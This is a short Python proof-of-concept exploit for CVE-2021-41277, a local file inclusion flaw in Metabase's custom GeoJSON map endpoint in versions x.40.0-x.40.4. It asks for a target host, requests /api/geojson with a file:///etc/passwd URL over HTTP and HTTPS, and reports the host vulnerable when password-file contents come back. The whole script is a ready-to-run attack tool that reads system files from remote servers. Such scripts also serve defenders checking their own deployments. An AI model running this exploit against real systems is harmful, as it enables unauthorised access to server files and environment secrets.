#!/usr/bin/python3
#PoC by RubX (Nadir Boulacheb)
#https://twitter.com/RubX_KuB
#METABASE CVE-2021â€“41277 
#Potential security issue with the custom GeoJSON map (admin->settings->maps->custom maps->add a map) support and potential local file inclusion (including environment variables). 
#Only Versions x.40.0-x.40.4 are affected.
#Source for advices : https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr

import requests
import colorama

colorama.init()

INCLUSION_PATH = "/etc/passwd"

def is_system_vulnerable(url):
    http_endpoint = f"http://{url}/api/geojson?url=file://{INCLUSION_PATH}"
    https_endpoint = f"https://{url}/api/geojson?url=file://{INCLUSION_PATH}"

    try:
        response = requests.get(http_endpoint)
        if response.status_code == requests.codes.ok and "root:x" in response.text:
            return http_endpoint
    except requests.exceptions.RequestException as e:
        pass

    try:
        response = requests.get(https_endpoint)
        if response.status_code == requests.codes.ok and "root:x" in response.text:
            return https_endpoint
    except requests.exceptions.RequestException as e:
        pass

    return False

if __name__ == "__main__":
    url = input("Enter the target IP or domain name: ")
    result = is_system_vulnerable(url)
    if result:
        print(colorama.Fore.GREEN + f"The target system at {url} is likely vulnerable to CVE-2021-41277 at endpoint: {result}")
    else:
        print(colorama.Fore.RED + f"The target system at {url} does not appear to be vulnerable to CVE-2021-41277")
